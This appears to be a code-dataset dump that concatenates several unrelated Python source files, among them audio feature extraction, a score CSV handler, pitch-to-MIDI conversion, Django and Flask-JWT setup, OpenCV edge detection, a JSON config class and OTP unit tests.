    s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
    s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
    # Smooth the boolean activity to suppress short flickers.
    smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
    smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
    # Resample from 100 Hz to the video frame rate and re-binarize at 0.1.
    s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
    s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
    s1x[s1x >= 0.1] = 1
    s2x[s2x >= 0.1] = 1
    s1x[s1x < 0.1] = 0
    s2x[s2x < 0.1] = 0
    return s1x, s2x
| 29.985185 | 88 | 0.644392 | import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def compute_prosody(audio_filename, time_step=0.05):
    """Compute normalized pitch and intensity curves with Praat (parselmouth).

    Args:
        audio_filename: path to the audio file
        time_step: sampling step in seconds
    Returns:
        (pitch_norm, intensity_norm): two 1d arrays sampled every time_step
    """
    audio = pm.Sound(audio_filename)
    # Extract pitch and intensity
    pitch = audio.to_pitch(time_step=time_step)
    intensity = audio.to_intensity(time_step=time_step)
    # Evenly spaced time steps
    times = np.arange(0, audio.get_total_duration() - time_step, time_step)
    # Compute prosodic features at each time step; NaNs (unvoiced) become 0.
    pitch_values = np.nan_to_num(
        np.asarray([pitch.get_value_at_time(t) for t in times])
    )
    intensity_values = np.nan_to_num(
        np.asarray([intensity.get_value(t) for t in times])
    )
    # Avoid log(0) below by clamping to the smallest positive float.
    intensity_values = np.clip(
        intensity_values, np.finfo(intensity_values.dtype).eps, None
    )
    # Normalize features [Chiu '11]
    pitch_norm = np.clip(np.log(pitch_values + 1) - 4, 0, None)
    intensity_norm = np.clip(np.log(intensity_values) - 3, 0, None)
    return pitch_norm, intensity_norm
def derivative(x, f):
    """ Calculate numerical derivative (by FDM) of a 1d array
    Args:
        x: input space x (in seconds; converted to milliseconds internally)
        f: Function of x
    Returns:
        der: numerical derivative of f wrt x; der[0] is 0 because the first
             sample has no preceding point to difference against
    """
    t_ms = 1000 * x  # from seconds to milliseconds
    # Assumes a uniform time step.
    dt = t_ms[1] - t_ms[0]
    # Backward differences (f[i] - f[i-1]) / dt, with a zero first sample.
    der = np.concatenate(([0.0], np.diff(f) / dt))
    return der
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
    """
    Extract all 4 prosodic features
    Args:
        audio_filename: file name for the audio to be used
        nb_frames: number of output frames the features are resampled to
        time_step: analysis step in seconds (default 0.02 s = 50 Hz)
    Returns:
        pros_feature: (nb_frames, 4) array: energy, energy_der, pitch, pitch_der
    """
    # Read audio from file (pydub) -- only used to obtain the total duration.
    sound = AudioSegment.from_file(audio_filename, format="wav")
    # Alternative prosodic features
    pitch, energy = compute_prosody(audio_filename, time_step)
    # pydub reports length in milliseconds.
    duration = len(sound) / 1000
    t = np.arange(0, duration, time_step)
    energy_der = derivative(t, energy)
    pitch_der = derivative(t, pitch)
    # Stack them all together
    pros_feature = np.stack((energy, energy_der, pitch, pitch_der))
    # And reshape
    pros_feature = np.transpose(pros_feature)
    # Resample from the analysis rate to the requested frame count.
    return sig.resample(pros_feature, nb_frames)
def split_audio_channels():
    """Split each session's two-channel c1_c2 wav into per-participant mono wavs.

    Channel 0 -> P1/audio.wav, channel 1 -> P2/audio.wav.  Existing outputs
    are skipped; the source wav is only decoded when at least one output is
    missing.  Writes go via a temp dir so a crash leaves no partial file.
    """
    files = list(DATA_DIR.glob("Sessions/*/*c1_c2.wav"))
    for file in tqdm(files, desc="Splitting audio files"):
        session = file.parent.name
        data = None  # lazily loaded on first missing output
        for i, participant in enumerate(("P1", "P2")):
            wav_file = DATASET_DIR / session / participant / "audio.wav"
            if wav_file.exists():
                continue
            if data is None:
                data, fs = soundfile.read(file)
            with tempfile.TemporaryDirectory() as tmpd:
                tmpf = Path(tmpd) / "audio.wav"
                # Column i of the stereo data is this participant's channel.
                soundfile.write(tmpf, data[:, i], fs, "PCM_16")
                wav_file.parent.mkdir(parents=True, exist_ok=True)
                shutil.move(tmpf, wav_file)
def chunk_audio():
    """Split each audio.wav into chunks at low-energy (silence) boundaries.

    Chunks are written as 00001.wav, 00002.wav, ... into an audio_chunks/
    directory next to the source file; sessions already chunked are skipped.
    """
    files = list(DATASET_DIR.glob("*/*/audio.wav"))
    for file in tqdm(files, desc="Chunking audio"):
        audio_chunk_dir = file.parent / "audio_chunks"
        if audio_chunk_dir.exists():
            continue
        y, fs = librosa.load(file, librosa.get_samplerate(file))
        # Non-silent intervals; top_db=3 keeps almost everything non-silent.
        segments = librosa.effects.split(y, top_db=3)
        prev_seg_start = 0
        tmpd = Path(tempfile.mkdtemp())
        # Each chunk spans from the previous segment start to this one's start.
        for i, segment in enumerate(segments, 1):
            data = y[prev_seg_start : segment[0]]
            soundfile.write(tmpd / f"{i:05}.wav", data, fs, "PCM_16")
            prev_seg_start = segment[0]
        # Trailing chunk: from the last segment start to the end of the file.
        soundfile.write(tmpd / f"{i+1:05}.wav", y[prev_seg_start:], fs, "PCM_16")
        # Atomic-ish publish: only move the dir into place once all chunks exist.
        shutil.move(tmpd, audio_chunk_dir)
def crosstalk_vad(
    speaker1_path,
    speaker2_path,
    frame_count,
    tha=30,
    thb=5,
    savgol_win=301,
    savgol_poly_order=1,
):
    """
    Per-speaker voice activity detection robust to channel crosstalk.

    Returns two binary arrays of length frame_count (one per speaker);
    1 means that speaker alone is active.

    tha: absolute dB level for when to consider there to be speech activity in a channel
    thb: minimum difference between channels to consider it to be one speaker only
    """
    fs, x1 = wav.read(speaker1_path)
    _, x2 = wav.read(speaker2_path)
    x1 = x1.astype("float")
    x2 = x2.astype("float")
    # calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
    e1 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    e2 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    # boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
    s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
    s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
    # Smooth the boolean activity to suppress short flickers.
    smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
    smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
    # Resample from 100 Hz to the video frame rate and re-binarize at 0.1.
    s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
    s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
    s1x[s1x >= 0.1] = 1
    s2x[s2x >= 0.1] = 1
    s1x[s1x < 0.1] = 0
    s2x[s2x < 0.1] = 0
    return s1x, s2x
def extract_prosody(fps):
    """Compute and cache prosodic features for every session audio file.

    Output length matches the frame count of the corresponding fps video;
    files with existing output or a missing video are skipped.
    """
    files = list(DATASET_DIR.glob("*/*/audio.wav"))
    for file in tqdm(files, desc="Extracting prosodic features"):
        prosody_file = file.parent / f"prosodic_features_{fps}fps.npy"
        video_file = file.parent / f"video_{fps}fps.mp4"
        if prosody_file.exists() or not video_file.exists():
            continue
        # The video's frame count defines the target feature length.
        nb_frames = count_video_frames(video_file)
        # Calculate prosodic features
        prosodic_featuers = extract_prosodic_features(str(file), nb_frames)
        np.save(prosody_file, prosodic_featuers)
def extract_mfcc(fps, num_cep=26, window_length=0.02, window_step=0.01, nfft=1024):
    """Compute and cache MFCCs for every session audio file.

    Args:
        fps: video frame rate the features are resampled to
        num_cep: number of cepstral coefficients
        window_length / window_step: analysis window in seconds
        nfft: FFT size
    """
    files = list(DATASET_DIR.glob("*/*/audio.wav"))
    for file in tqdm(files, desc="Extracting mfccs"):
        mfcc_file = file.parent / f"mfcc_{fps}fps.npy"
        video_file = file.parent / f"video_{fps}fps.mp4"
        if mfcc_file.exists() or not video_file.exists():
            continue
        # The video's frame count defines the target feature length.
        nb_frames = count_video_frames(video_file)
        # Calculate MFCC feature with the window frame it was designed for
        fs, audio = wav.read(file)
        mfcc_features = mfcc(
            audio,
            winlen=window_length,
            winstep=window_step,
            samplerate=fs,
            numcep=num_cep,
            nfft=nfft,
        )
        # Resample to desired frame length
        resampled_mfccs = sig.resample(mfcc_features, nb_frames)
        np.save(mfcc_file, resampled_mfccs)
def extract_vad(fps):
    """Compute and cache crosstalk VAD for both participants of each session.

    Sessions that already have a VAD file, or that are missing either video
    (the video frame count defines the VAD length), are skipped.
    """
    sessions = list(DATASET_DIR.glob("*"))
    for session in tqdm(sessions, desc="Extracting crosstalk vad"):
        p1_wav = session / "P1" / "audio.wav"
        p2_wav = session / "P2" / "audio.wav"
        p1_vad_file = session / "P1" / f"crosstalk_vad_{fps}fps.npy"
        p2_vad_file = session / "P2" / f"crosstalk_vad_{fps}fps.npy"
        p1_video_file = session / "P1" / f"video_{fps}fps.mp4"
        p2_video_file = session / "P2" / f"video_{fps}fps.mp4"
        if p1_vad_file.exists() or p2_vad_file.exists():
            continue
        if not p1_video_file.exists() or not p2_video_file.exists():
            continue
        p1_nb_frames = count_video_frames(p1_video_file)
        p2_nb_frames = count_video_frames(p2_video_file)
        # Both VAD tracks must have the same length.
        assert p1_nb_frames == p2_nb_frames
        p1, p2 = crosstalk_vad(p1_wav, p2_wav, p1_nb_frames)
        np.save(p1_vad_file, p1)
        try:
            np.save(p2_vad_file, p2)
        except Exception:
            # Keep the pair consistent: if P2 cannot be written, remove P1 so
            # the session is re-processed on the next run.  (Was a bare
            # `except:`, which also swallowed KeyboardInterrupt/SystemExit.)
            p1_vad_file.unlink()
deeb4aa4c9389421b410b823b599dee2b492e6f4 | 916 | py | Python | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | ''' Functions with output
def my_function(something):
#Do this with something
#Then do this
#finally do this
def my_function():
return 3 * 2 # result
'''
# def format_name(f_name, l_name):
# print(f_name.title())
# print(l_name.title())
# format_name("rich", "MATSON") # Rich
# Matson
# def format_name(f_name, l_name):
# formated_f_name = f_name.title()
# formated_l_name = l_name.title()
# print(f"{formated_f_name} {formated_l_name}") # Richard Matson
# format_name("RichARD", "MATSON")
# formated_string = format_name("RichARD", "MATSON")
# print(formated_string) # Richard Matson
print(format_name("RicHARD", "MATSON")) # Richard Matson
output = len("Richard")
| 21.302326 | 69 | 0.651747 | ''' Functions with output
def my_function(something):
#Do this with something
#Then do this
#finally do this
def my_function():
return 3 * 2 # result
'''
# def format_name(f_name, l_name):
# print(f_name.title())
# print(l_name.title())
# format_name("rich", "MATSON") # Rich
# Matson
# def format_name(f_name, l_name):
# formated_f_name = f_name.title()
# formated_l_name = l_name.title()
# print(f"{formated_f_name} {formated_l_name}") # Richard Matson
# format_name("RichARD", "MATSON")
def format_name(f_name, l_name):
    """Return the first and last name title-cased and joined by a space."""
    return " ".join(part.title() for part in (f_name, l_name))
# formated_string = format_name("RichARD", "MATSON")
# print(formated_string) # Richard Matson
print(format_name("RicHARD", "MATSON")) # Richard Matson
output = len("Richard")
| 136 | 0 | 23 |
b701bc49a8f78c1f99f8cb01373047a279aef075 | 887 | py | Python | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | import csv
import os
from score_comparer import ScoreComparer
| 34.115385 | 77 | 0.685457 | import csv
import os
from score_comparer import ScoreComparer
def HandleCsv(csv_path, final_score_dict):
  """Merge ``final_score_dict`` with any scores already stored in ``csv_path``
  and rewrite the file with the merged rows.

  Each value of ``final_score_dict`` is indexable as
  (title, score, stars, difficulty, accuracy, score_date).
  """
  csv_exists = os.path.isfile(csv_path)
  if csv_exists:
    # Merge the new scores against the previously saved rows.
    with open(csv_path, 'r') as read_scores:
      csv_reader = csv.reader(read_scores)
      existing_scores = list(csv_reader)
    compared_scores = ScoreComparer(final_score_dict, existing_scores, 'csv')
    final_score_dict = compared_scores
  if final_score_dict:
    # Rewrite the whole file from the (possibly merged) score dict.
    with open(csv_path, 'w') as writer:
      csvwriter = csv.writer(writer)
      for score_details in final_score_dict.values():
        title = score_details[0]
        score = score_details[1]
        stars = score_details[2]
        difficulty = score_details[3]
        accuracy = score_details[4]
        score_date = score_details[5]
        # NOTE(review): rows are written as (title, score, difficulty, stars,
        # accuracy, date) -- difficulty/stars order differs from the unpack
        # order above; confirm this matches what ScoreComparer reads back.
        csvwriter.writerow([title, score, difficulty, stars,
                            accuracy, score_date])
| 802 | 0 | 23 |
1d5caf304ff7c630a8244058d57493b0771b5dfa | 1,987 | py | Python | annotation_process/onset.py | marl/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 81 | 2018-05-04T19:53:45.000Z | 2022-01-27T15:17:42.000Z | annotation_process/onset.py | funkfuzz/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 4 | 2019-03-12T19:50:44.000Z | 2020-05-15T13:38:56.000Z | annotation_process/onset.py | funkfuzz/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 12 | 2018-05-04T19:54:08.000Z | 2022-01-19T17:37:52.000Z | import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='analyze whole stems.')
parser.add_argument(
'inpath', type=str, help='path to the stem of interest')
parser.add_argument(
'outpath', type=str, help='path to the stem of interest')
rough_midi(parser.parse_args())
| 30.569231 | 97 | 0.621037 | import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
def rough_midi(args):
    """Write a rough MIDI transcription of ``args.inpath`` (wav) to
    ``args.outpath`` (mid) using the pYIN "notes" vamp plugin.

    Returns 0 in all cases; does nothing if the output file already exists.
    """
    if os.path.exists(args.outpath):
        print('file already exist')
        return 0
    # Load at the file's native sample rate (sr=None).
    y, fs = librosa.load(args.inpath, sr=None)
    # tempo = int(args.inpath.split('_')[1].split('-')[1])
    print('finished loading')
    # pYIN note-tracking parameters (plugin thresholds/sensitivities).
    param = {"threshdistr": 2,
             "lowampsuppression": 0.08,
             "outputunvoiced": 2,
             "precisetime": 0,
             "prunethresh": 0.05,
             "onsetsensitivity": 0.8}
    pyin_note_output = vamp.collect(y, fs, 'pyin:pyin', output='notes', parameters=param)['list']
    print('finished pYin')
    midi = build_midi_from_output(pyin_note_output)
    midi.write(args.outpath)
    return 0
def build_midi_from_output(pyin_note_output):
    """Convert pYIN note events into a :class:`pretty_midi.PrettyMIDI` object.

    Each event supplies 'values' (frequency in Hz), 'timestamp' and
    'duration'; the resulting notes go on a single program-25 instrument
    appended to the 'tempo_template.mid' template.
    """
    midi = pretty_midi.PrettyMIDI('tempo_template.mid')
    ch = pretty_midi.Instrument(program=25)
    for note in pyin_note_output:
        # Round the tracked frequency to the nearest integer MIDI pitch.
        pitch = int(round(librosa.hz_to_midi(note['values'])[0]))
        st = float(note['timestamp'])
        dur = float(note['duration'])
        # print(pitch, st, dur )
        n = pretty_midi.Note(
            velocity=100,
            pitch=pitch, start=st,
            end=st+dur
        )
        ch.notes.append(n)
        # bend_amount = int(round((note.value - pitch) * 4096))
        # pb = pretty_midi.PitchBend(pitch=bend_amount*q, time=st)
        # ch.pitch_bends.append(pb)
    midi.instruments.append(ch)
    return midi
if __name__ == '__main__':
    # CLI entry point: rough-transcribe one stem WAV into a MIDI file.
    parser = argparse.ArgumentParser(
        description='analyze whole stems.')
    parser.add_argument(
        'inpath', type=str, help='path to the stem of interest')
    # NOTE(review): outpath reuses inpath's help text; it is actually the
    # destination .mid path.
    parser.add_argument(
        'outpath', type=str, help='path to the stem of interest')
    rough_midi(parser.parse_args())
| 1,501 | 0 | 46 |
2247560231332cd3b4dc8cbf8ea9235b791cb557 | 403 | py | Python | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | null | null | null | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | 2 | 2016-01-18T16:23:53.000Z | 2016-02-22T08:50:56.000Z | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | null | null | null | import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Allow overriding the admin site title via an environment variable.
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')
# Route /admin/ to the Django admin; everything else to the hub app.
urlpatterns = patterns(
    '',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^', include('hub.urls')),
)
# Append Django's staticfiles URL helpers.
urlpatterns += staticfiles_urlpatterns()
| 26.866667 | 77 | 0.744417 | import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('hub.urls')),
)
urlpatterns += staticfiles_urlpatterns()
| 0 | 0 | 0 |
90623213d36080058235d77137f677569c026eb7 | 1,397 | py | Python | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
"MIT"
] | null | null | null | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
"MIT"
] | null | null | null | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
"MIT"
] | null | null | null |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Create kernel for cv2 dilation method
KERNEL = np.ones((5,5),np.uint8)
# Import the model
model = load_model('big_model')
# NOTE(review): `model` is loaded but never used below -- recognition is not
# wired up yet (see the TODO links at the bottom of this file).
# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))
# Edge pipeline: grayscale -> Gaussian blur -> Canny -> dilate.
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations = 1)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Convert back to 3 channels so the green markers drawn below are visible.
edges = cv2.cvtColor(edges,cv2.COLOR_GRAY2RGB)
# Mark every point of the first detected contour with a green dot.
for points in contours[0]:
    coor_list = points[0].tolist()
    edges = cv2.circle(edges, (coor_list[0],coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)
cv2.imshow('edges', edges)
# NOTE(review): no cv2.waitKey() between imshow and destroyAllWindows, so the
# window closes immediately -- confirm this is intended.
cv2.destroyAllWindows()
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| 29.723404 | 125 | 0.759485 |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Create kernel for cv2 dilation method
KERNEL = np.ones((5,5),np.uint8)
# Import the model
model = load_model('big_model')
# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations = 1)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
edges = cv2.cvtColor(edges,cv2.COLOR_GRAY2RGB)
for points in contours[0]:
coor_list = points[0].tolist()
edges = cv2.circle(edges, (coor_list[0],coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)
cv2.imshow('edges', edges)
cv2.destroyAllWindows()
# Helpful links to continue this:
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| 0 | 0 | 0 |
a5c8abe1c65669f643bb9cbb0eb349888db744a9 | 1,311 | py | Python | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | null | null | null | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | 3 | 2021-03-17T16:05:01.000Z | 2021-05-01T18:47:43.000Z | src/lib/config.py | RonaldHiemstra/BronartsmeiH | 1ad3838b43abfe9a1f3416334439c8056aa50dde | [
"MIT"
] | null | null | null | """Support file to handle configuration files."""
import json
import os
class Config():
"""Class for serializing configuration items."""
def get(self, key=None, default=None):
"""Get a config item."""
if key is None:
# return all public config items (filter out the hidden items)
return {key: self.__config[key] for key in self.__config if not key.startswith('__')}
return self.__config.get(key, default)
def set(self, key, value):
"""Set a config item."""
self.__config[key] = value
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
def remove(self, key):
"""Set a config item."""
del self.__config[key]
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
| 31.214286 | 97 | 0.540809 | """Support file to handle configuration files."""
import json
import os
class Config():
    """Serialize configuration items to a JSON file.

    The configuration is loaded from ``filename`` on construction; every
    :meth:`set` / :meth:`remove` immediately persists the full dict back
    to disk. Keys starting with ``__`` are treated as hidden and excluded
    from the "all items" view returned by ``get()``.
    """

    def __init__(self, filename):
        """Load configuration from ``filename``; if the file is missing,
        create its directory tree and start with an empty configuration."""
        self.filename = filename
        try:
            with open(self.filename) as file:
                self.__config = json.load(file)
        except OSError:
            # File (or its directory) does not exist yet. Create each path
            # component individually with os.mkdir (os.makedirs may be
            # unavailable on minimal platforms), ignoring components that
            # already exist.
            path = ''
            for part in filename.split('/')[:-1]:
                try:
                    os.mkdir(path + part)
                except OSError:
                    pass
                path += part + '/'
            self.__config = dict()

    def _save(self):
        """Persist the current configuration to disk as JSON."""
        with open(self.filename, 'w') as file:
            file.write(json.dumps(self.__config))

    def get(self, key=None, default=None):
        """Get a config item, or all public items when *key* is None."""
        if key is None:
            # return all public config items (filter out the hidden items)
            return {key: self.__config[key] for key in self.__config if not key.startswith('__')}
        return self.__config.get(key, default)

    def set(self, key, value):
        """Set a config item and persist the configuration."""
        self.__config[key] = value
        self._save()

    def remove(self, key):
        """Remove a config item and persist the configuration."""
        del self.__config[key]
        self._save()
| 434 | 0 | 27 |
f2992e31d0f58be982aab9d0bf92129cdc5b1c9e | 1,038 | py | Python | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | python-jwt.py | HTTP101/sturdy-octo-barnacle | 843df5bf3f65ab0617a2794b28ecaffef271d2ec | [
"MIT"
] | null | null | null | from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
@jwt.invalid_token_loader
@jwt.unauthorized_loader
| 23.066667 | 68 | 0.701349 | from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
# Secret used to sign/verify JWTs, sourced from the app's Config class.
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
# NOTE(review): presumably set so JWT errors reach the custom handlers
# below under production servers -- confirm.
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
def expired_token_callback(expired_token):
    """Return a 401 JSON payload when an expired JWT is presented."""
    print("Ex")  # NOTE(review): leftover debug print -- consider removing
    token_type = expired_token['type']
    return jsonify({
        'success': 0,
        'message': 'The {} token has expired'.format(token_type)
    }), 401
@jwt.invalid_token_loader
def invalid_token_callback(reason):
    """Return a 422 JSON payload when a malformed/invalid JWT is presented."""
    print("Inv")  # NOTE(review): leftover debug print -- consider removing
    return jsonify({
        'success':0,
        'message':"The Given Token Is Invalid",
        'info':reason
    }),422
@jwt.unauthorized_loader
def unauthorized_loader_callback(reason):
    """Return a 401 JSON payload when the Authorization header is missing."""
    print("Unauth")  # NOTE(review): leftover debug print -- consider removing
    return jsonify({
        'success':0,
        'message':"There is no Authorization Header in the request",
        'info':reason
    }),401
| 534 | 0 | 66 |
31a685b4046ff71a9304718c2fbced073961b530 | 6,496 | py | Python | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 395 | 2015-01-12T19:20:13.000Z | 2022-03-30T05:40:40.000Z | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 2,388 | 2015-01-01T20:09:19.000Z | 2022-03-29T16:49:14.000Z | test/test_user_otp.py | HailLab/girder | 974d869e6f53ec87a5e64730fee27eb6314fc006 | [
"Apache-2.0"
] | 177 | 2015-01-04T14:47:00.000Z | 2022-03-25T09:01:51.000Z | # -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
| 33.484536 | 99 | 0.68319 | # -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
def testInitializeOtp(user):
    """initializeOtp should return a branded TOTP URI without enabling OTP."""
    # The logic for the server hostname as the issuer cannot be tested here, since there is no
    # current request, but that logic is explicitly tested in testOtpApiWorkflow
    Setting().set(SettingKey.BRAND_NAME, 'Branded Girder')
    otpUris = User().initializeOtp(user)
    # A URI for TOTP should be returned
    assert otpUris['totpUri'].startswith('otpauth://')
    assert user['login'] in otpUris['totpUri']
    assert 'issuer=Branded%20Girder' in otpUris['totpUri']
    # OTP should not be enabled yet, since it's not finalized
    assert user['otp']['enabled'] is False
    # TOTP parameters should be generated
    assert 'totp' in user['otp']
def testHasOtpEnabled(user):
    """hasOtpEnabled is True only once OTP is explicitly flagged enabled."""
    assert User().hasOtpEnabled(user) is False
    User().initializeOtp(user)
    # OTP is not yet enabled
    assert User().hasOtpEnabled(user) is False
    user['otp']['enabled'] = True
    assert User().hasOtpEnabled(user) is True
def _tokenFromTotpUri(totpUri, valid=True):
    """Generate a TOTP token for *totpUri*; produce a wrong one when
    *valid* is False."""
    # Build an external TOTP generator from the provisioning URI.
    from passlib.totp import TOTP

    otpToken = TOTP.from_uri(totpUri).generate().token
    if valid:
        return otpToken
    # Shift the token by one (mod 10^6) so it is guaranteed not to match.
    return '%06d' % ((int(otpToken) + 1) % int(1e6))
def testVerifyOtp(server, user):
    """verifyOtp rejects invalid tokens and rejects token reuse."""
    # Enable OTP
    otpUris = User().initializeOtp(user)
    user['otp']['enabled'] = True
    # Generate an invalid token
    otpToken = _tokenFromTotpUri(otpUris['totpUri'], False)
    with pytest.raises(AccessException):
        User().verifyOtp(user, otpToken)
    # Generate a valid token
    otpToken = _tokenFromTotpUri(otpUris['totpUri'])
    # Verify the token, which should succeed without raising an exception
    User().verifyOtp(user, otpToken)
